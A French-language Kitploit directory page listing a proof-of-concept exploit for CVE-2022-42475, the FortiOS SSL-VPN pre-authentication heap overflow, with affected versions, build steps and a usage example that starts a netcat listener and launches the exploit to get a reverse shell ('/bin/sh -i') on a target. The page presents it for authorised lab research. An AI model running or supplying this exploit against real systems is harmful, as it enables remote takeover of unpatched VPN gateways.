Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2022-42475-poc — Preuve de concept (PoC) pour la recherche et la validation contrôlée en laboratoire de CVE-2022-42475, une vulnérabilité critique de débordement de tampon basé sur le tas affectant le service SSL-VPN de certaines versions de FortiOS. | Kitploit
Outils/GitHubGitHub/ull0a/cve-2022-42475-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

Preuve de concept (PoC) pour la recherche et la validation contrôlée en laboratoire de CVE-2022-42475, une vulnérabilité critique de débordement de tampon basé sur le tas affectant le service SSL-VPN de certaines versions de FortiOS.

Voir le dépôt
1il y a 6h 29mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-42475 PoC

Exécution de code à distance avant authentification sur SSL VPN Fortinet

Description

CVE-2022-42475 est une vulnérabilité de dépassement de tampon basé sur le tas (heap-based buffer overflow) dans le service SSL VPN de FortiOS qui permet à des attaquants non authentifiés d'exécuter du code arbitraire à distance (RCE) via des requêtes HTTP spécialement conçues envoyées au point de terminaison /remote/error.

Cette vulnérabilité a été activement exploitée dans la nature (0-day) avant la publication du correctif officiel.

Exécution du PoC

La capture suivante montre l'exécution du PoC dans un environnement de laboratoire autorisé :

La sortie montre l'exécution du PoC et l'interaction avec l'instance FortiOS utilisée pour les tests.

Exécution du PoC

Informations sur le CVE

ChampValeur
ID CVECVE-2022-42475
CVSS 3.19.3 (Critique)
VecteurCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
DécouvertDécembre 2022
Correctif officielFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

Versions affectées

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

Prérequis

  • Go 1.18+ (pour compiler le PoC)
  • Accès réseau à la cible sur le port 443 (ou port SSL VPN configuré)
  • Environnement de laboratoire autorisé pour effectuer les tests

Compilation

root@kitploit:~
# Cloner ou télécharger le code source
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# Compiler
go build -o exploit exploit.go

# Ou exécuter directement
go run exploit.go <cible> <port> <ip_reverse> <paramètres>

Utilisation

root@kitploit:~
./exploit <hôte_cible> <port_cible> <ip_reverse> <param1> [param2...]

Exemple

root@kitploit:~
# Sur l'attaquant, démarrer un listener
nc -lvnp 80

# Exécuter l'exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
Télécharger l’outil